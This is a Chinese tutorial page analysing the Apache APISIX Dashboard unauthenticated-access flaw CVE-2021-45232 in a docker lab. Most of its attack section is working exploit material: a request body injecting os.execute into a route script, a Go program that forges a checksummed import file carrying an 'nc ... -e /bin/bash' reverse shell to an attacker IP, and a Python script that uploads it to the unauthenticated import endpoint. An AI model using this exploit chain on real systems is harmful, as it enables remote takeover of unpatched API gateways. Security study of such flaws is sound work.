脚本之家 服务器常用软件
快捷导航
您的位置:首页网站技巧服务器Linux → Apache APISIX Dashboard 未授权访问漏洞

Apache APISIX Dashboard 未授权访问漏洞分析(CVE-2021-45232)

 更新时间:2023年03月16日 14:45:25   作者:Big&Bird  
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能,这篇文章主要介绍了Apache APISIX Dashboard 未授权访问漏洞(CVE-2021-45232),需要的朋友可以参考下

声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

漏洞描述

Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。

影响范围

Apache APISIX Dashboard < 2.10.1

环境部署

通过git clone apisix-docker

git clone https://github.com/apache/apisix-docker
cd apisix-docker/example/

修改docker-compose.yml

apache/apisix-dashboard:2.7
apache/apisix:2.6-alpine


然后,docker-compose up -d 启动环境

环境起来后,浏览器通过默认端口9000访问apisix dashboard

后台RCE

由于apisix dashboard 默认账号和密码是admin:admin,所以我们先登录到后台,来验证一把远程命令执行

首先创建一个上游服务,点击创建,名称随意命名,目标节点填写我们转发请求的服务,这里我们填写docker附带的Grafana应用,端口号为3000,点击下一步,提交即可。

其次,创建一个路由,名称任意起,路径也是自定义,点击下一步,选择我们刚才创建的上游服务,最后,提交即可。

查看创建的路由

回到路由配置页面,点击配置,然后一直下一步,直到提交时,使用BurpSuite抓包

然后在请求包的body中,添加一个script字段后,发送请求。

"script": "os.execute('touch /tmp/Keepb1ue')"

再次查看,路由配置信息

接着,我们访问一下: http://192.168.10.171:9080/rce111

docker中看一下,是否创建了Keepblue这个文件

未授权接口RCE

如果没有默认密码或者弱密码的话,这时我们就利用未授权接口进行RCE了

/apisix/admin/migrate/export
/apisix/admin/migrate/import

首先,使用/apisix/admin/migrate/export导出配置文件

因为是未授权,所以在未登陆情况下,BP抓包后,请求接口改为/apisix/admin/migrate/export,点击send后,看到配置文件信息

在导入配置文件时,会对配置文件的checksum值进行校验,那这里其实是可以通过写脚本算出checksum校验值,或者是根据apisix的源码去计算出新的checksum值

源码位置在:apisix-dashboard-master\api\internal\handler\migrate\migrate.go的ExportConfig函数将其计算源码单独抽取出来,并将需要导入的配置(data)进修替换和插入RCE语句

package main

import (
    "encoding/binary"
    "fmt"
    "hash/crc32"
    "io/ioutil"
    "os"
)
func main() {
    gen()
}
func gen() {
    data := []byte(`{"Counsumers":[],"Routes":[{"id":"403141558204891851","create_time":1649820693,"update_time":1649821490,"uris":["/rce111"],"name":"lyroute","methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE"],"script":"os.execute('nc 192.168.8.14 2333 -e /bin/bash')","script_id":"403141558204891851","upstream_id":"403140847589130955","status":1}],"Services":[],"SSLs":[],"Upstreams":[{"id":"403140847589130955","create_time":1649820270,"update_time":1649820270,"nodes":[{"host":"192.168.10.171","port":3000,"weight":1}],"timeout":{"connect":6,"read":6,"send":6},"type":"roundrobin","scheme":"http","pass_host":"pass","name":"lytest"}],"Scripts":[{"id":"403141558204891851","script":"os.execute('nc 192.168.8.14 2333 -e /bin/bash')"}],"GlobalPlugins":[],"PluginConfigs":[]}`)
    checksumUint32 := crc32.ChecksumIEEE(data)
    checksumLength := 4
    checksum := make([]byte, checksumLength)
    binary.BigEndian.PutUint32(checksum, checksumUint32)
    fileBytes := append(data, checksum...)

    content := fileBytes
    fmt.Println(content)

    importData := content[:len(content)-4]
    checksum2 := binary.BigEndian.Uint32(content[len(content)-4:])
    if checksum2 != crc32.ChecksumIEEE(importData) {
        fmt.Println(checksum2)
        fmt.Println(crc32.ChecksumIEEE(importData))
        fmt.Println("Check sum check fail, maybe file broken")
        return
    }
    err := ioutil.WriteFile("apisixPayload", content, os.ModePerm)
    if err != nil {
        fmt.Println("error!!")
        return
    }
}

运行这段脚本,会生成apisixPayload这个文件

这个就是我们要import上去的计算好校验值的新的配置文件,接下来使用python代码可以简单的传到服务端

import requests
url = "http://192.168.10.171:9000/apisix/admin/migrate/import"
files = {"file": open("apisixPayload", "rb")}
r = requests.post(url, data={"mode": "overwrite"}, files=files)
print(r.status_code)
print(r.content)

在攻击机上,开启nc监听

接下来,访问路由地址(http://192.168.10.171:9080/rce111),触发远程命令执行

查看nc反弹shell

反弹成功,说明命令已经执行

到此这篇关于Apache APISIX Dashboard 未授权访问漏洞(CVE-2021-45232)的文章就介绍到这了,更多相关Apache APISIX Dashboard 未授权访问漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • CentOS下RabbitMq高可用集群环境搭建教程

    CentOS下RabbitMq高可用集群环境搭建教程

    这篇文章主要为大家详细介绍了CentOS下RabbitMq高可用集群环境搭建教程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2017-08-08
  • 使用ssh-keygen,实现免密码登陆linux的方法

    使用ssh-keygen,实现免密码登陆linux的方法

    下面小编就为大家带来一篇使用ssh-keygen,实现免密码登陆linux的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-11-11
  • linux如何为一台实例分配一个公网IP地址

    linux如何为一台实例分配一个公网IP地址

    在本篇文章中我们给大家分享了一篇关于linux如何为一台实例分配一个公网IP地址的知识内容,有需要的朋友们学习下。
    2018-10-10
  • centos7.2.1511安装jdk1.8.0_151及mysql5.6.38的方法

    centos7.2.1511安装jdk1.8.0_151及mysql5.6.38的方法

    这篇文章主要介绍了centos7.2.1511安装jdk1.8.0_151及mysql5.6.38的方法,较为详细的讲述了centos7.2.1511安装jdk1.8.0_151及mysql5.6.38的具体步骤与相关设置技巧,需要的朋友可以参考下
    2018-01-01
  • linux 下 g++编译程序时-I(大写i) 与-L(大写l)-l(小写l) 的作用详解

    linux 下 g++编译程序时-I(大写i) 与-L(大写l)-l(小写l) 的作用详解

    这篇文章主要介绍了linux 下 g++编译程序时-I(大写i) 与-L(大写l)-l(小写l) 的作用,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2020-03-03
  • linux挂载新硬盘过程分享

    linux挂载新硬盘过程分享

    最近有个生产机由于缓存问题,硬盘不太够用,所以就加载了一块硬盘,下面把挂载硬盘的过程记录下,供大家参考
    2014-01-01
  • apache日志文件详解和实用分析命令

    apache日志文件详解和实用分析命令

    这篇文章主要介绍了apache日志文件每条数据的请意义,以及一些实用日志分析命令,需要的朋友可以参考下
    2014-03-03
  • Ubuntu解压zip文件乱码的解决方法

    Ubuntu解压zip文件乱码的解决方法

    最近在工作中遇到一个问题,在Ubuntu的系统下解压zip文件的时候居然出现了乱码,通过查找网上的资料终于解决了,所以想着把解决问题的两个方法分享给大家,方便有需要的朋友们能够参考借鉴,下面来一起看看吧。
    2016-11-11
  • linux如何安装python3

    linux如何安装python3

    在Linux系统中安装Python3需要先安装依赖,然后下载安装包进行编译安装,具体步骤包括安装依赖、下载Python3安装包、解压、配置安装目录、编译安装,以及添加软连接,安装成功后,通过验证python3和pip3的版本来确认安装是否成功,本教程基于个人经验,旨在提供一个参考
    2024-10-10
  • Linux中如何开启或关闭SELinux

    Linux中如何开启或关闭SELinux

    这篇文章主要介绍了Linux中如何开启或关闭SELinux问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教
    2024-02-02

最新评论